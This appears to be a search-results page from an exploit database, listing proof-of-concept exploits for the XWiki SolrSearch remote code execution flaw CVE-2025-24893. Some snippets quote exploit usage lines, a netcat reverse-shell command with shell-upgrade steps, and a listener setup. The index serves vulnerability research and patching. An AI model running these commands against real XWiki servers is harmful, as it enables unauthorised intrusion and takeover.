Lucene search
+L

34 matches found

Kitploit
Kitploit
added 2026/09/02 4:43 a.m.6 views

CVE-2025-24893

CVE-2025-24893 Usage root@kitploit: python CVE-2025-24893 http://target.com...

9.8CVSS7.3AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/01 10:01 p.m.5 views

CVE-2025-24893

CVE-2025-24893 XWiki RCE Vulnerability Analysis Environment Setup 1. Running XWiki 15.10.10 Environment root@kitploit: docker-compose up -d 2. Accessing XWiki URL: http://localhost:8080 Proceed with testing after completing the initial setup Create an admin account after accessing the initial...

9.8CVSS7.3AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/01 1:40 p.m.3 views

CVE-2025-24893-RCE-PoC

Infos This PoC first tests for the SSTI and if it works. It will go in loop and allows you to run commands remotly. The exec and shell command do the same currently. Installation root@kitploit: python3 -m pip install requirements.txt Usage Connecting root@kitploit: python3 poc.py Example With deb...

9.8CVSS7.3AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/01 1:12 p.m.4 views

CVE-2025-24893-POC

CVE-2025-24893 Install bun: root@kitploit: curl -fsSL https://bun.com/install | bash To install dependencies: root@kitploit: bun install To run: root@kitploit: bun run CVE-2025-24893.ts This project was created using bun init in bun v1.2.19. Bun is a fast all-in-one JavaScript runtime. How to use...

9.8CVSS7.3AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/01 8:58 a.m.3 views

CVE-2025-24893-PoC

Disclaimer: The vulnerabilities and reproduction steps described in this document are intended solely for cybersecurity research and educational purposes. No one shall use the information provided in this document for illegal purposes or unauthorized system testing. The author assumes no...

9.8CVSS7.3AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/01 5:32 a.m.4 views

CVE-2025-24893

Reverse shell for CVE-2025-24893 root@kitploit: python3 CVE-2025-24893.py -u http://wiki.editor.htb/ -c "busybox nc -e /bin/bash" upgrade the shell 1. python3 -c 'import pty; pty.spawn"/bin/bash"' 2. ctrl + z 3. stty size 4. stty raw -echo; fg 5. stty rows x columns y 6. export TERM=xterm...

9.8CVSS7.3AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/01 4:02 a.m.7 views

xwiki_solrsearch-rce-exploit

solrsearch-rce-exploit Unauth RCE PoC for XWiki SolrSearch CVE-2025-24893. Command exec + reverse shell. CVE-2025-24893 – XWiki SolrSearch RCE PoC Proof-of-concept for the XWiki SolrSearch template injection leading to unauthenticated remote code execution. Tested against XWiki Debian 15.10.8...

9.8CVSS7.6AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/01 1:41 a.m.4 views

POC-for-CVE-2025-24893

Only for assisting with vulnerability remediation, do not use for other purposes...

9.8CVSS7.3AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/08/31 3:51 p.m.4 views

xwiki-15.10.8-reverse-shell-cve-2025-24893

Exploit de Reverse Shell CVE-2025-24893 para XWiki Descargo de responsabilidad: Este script está destinado solo con fines educativos y pruebas de seguridad autorizadas. No lo utilice en sistemas que no posea o para los que no tenga permiso explícito para realizar pruebas. El mal uso puede ser...

9.8CVSS7.5AI score0.99864EPSS
SaveExploits52References1
Kitploit
Kitploit
added 2026/08/31 3:48 p.m.3 views

XWiki-Platform-RCE-CVE-2025-24893

Exploit de RCE no autenticado en XWiki Platform Descripción general Este script es una implementación renovada en Bash de un exploit que apunta a las versiones de XWiki Platform afectadas por CVE-2025-24893. Aprovecha una vulnerabilidad crítica de ejecución remota de código no autenticado que...

9.8CVSS7.9AI score0.99864EPSS
SaveExploits52References1
Kitploit
Kitploit
added 2026/08/31 3:00 p.m.1 views

xwiki-cve-2025-24893-poc

PoC de Exploit RCE en XWiki CVE-2025-24893 Descripción general Este repositorio contiene una Prueba de Concepto PoC del exploit para la vulnerabilidad de Ejecución Remota de Código RCE en XWiki identificada como CVE-2025-24893. La vulnerabilidad permite a un atacante ejecutar código arbitrario en...

9.8CVSS7.7AI score0.99864EPSS
SaveExploits52References1
Kitploit
Kitploit
added 2026/08/30 4:27 p.m.3 views

CVE-2025-24893

CVE-2025-24893 Script POC en Bash para la vulnerabilidad de RCE en XWiki Platform Ejemplo de uso: Configurar un listener de netcat: root@kitploit: $ nc -nvlp Después ejecutar el script: root@kitploit: $ chmod +x cve.sh $ ./cve.sh Versiones afectadas: Desde 5.4 hasta 15.10.11 Desde 16.0.0 hasta...

9.8CVSS7.3AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/08/26 10:51 p.m.3 views

CVE-2025-24893-POC

CVE-2025-24893-POC Un POC per CVE-2025-24893 scritto in python Utilizzo python3 -u the url...

9.8CVSS8.4AI score0.99864EPSS
SaveExploits52
Nuclei
Nuclei
added 2026/08/25 6:03 a.m.118 views

XWiki Platform - Remote Code Execution

Any guest can perform arbitrary remote code execution through a request to SolrSearch. This impacts the confidentiality, integrity, and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 15.10.11, 16.4.1, and 16.5.0RC1. id: CVE-2025-24893 info: name: XWiki...

9.8CVSS9.2AI score0.99864EPSS
SaveExploits52References2
GithubExploit
GithubExploit
added 2026/08/19 11:30 a.m.17 views

Exploit for Eval Injection in Xwiki

CVE-2025-24893 - XWiki SolrSearch SSTI to unauthenticated RCE...

9.8CVSS8.5AI score0.99864EPSS
SaveExploits52
GithubExploit
GithubExploit
added 2026/01/26 2:21 p.m.204 views

Exploit for Eval Injection in Xwiki

CVE-2025-24893- CVE-20...

9.8CVSS5.9AI score0.99864EPSS
SaveExploits52
GithubExploit
GithubExploit
added 2025/12/28 6:40 p.m.256 views

Exploit for Code Injection in Xwiki

CVE-2025-24893 – XWiki Remote Command Execution Proof of Conc...

9.8CVSS8.2AI score0.99864EPSS
SaveExploits52
GithubExploit
GithubExploit
added 2025/12/19 10:52 a.m.161 views

Exploit for Code Injection in Xwiki

CVE-2025-24893 Remote Code Execution exploit for XWikihttp...

9.8CVSS7.2AI score0.99864EPSS
SaveExploits52
GithubExploit
GithubExploit
added 2025/12/03 8:43 p.m.260 views

Exploit for Code Injection in Xwiki

XWiki Platform Unauthenticated RCE Exploit Overview This s...

9.8CVSS9.5AI score0.99864EPSS
SaveExploits52
GithubExploit
GithubExploit
added 2025/11/28 1:26 a.m.174 views

Exploit for Code Injection in Xwiki

Description: XWiki Platform is a generic wiki platform offering...

9.8CVSS8.3AI score0.99864EPSS
SaveExploits52
Rows per page
Query Builder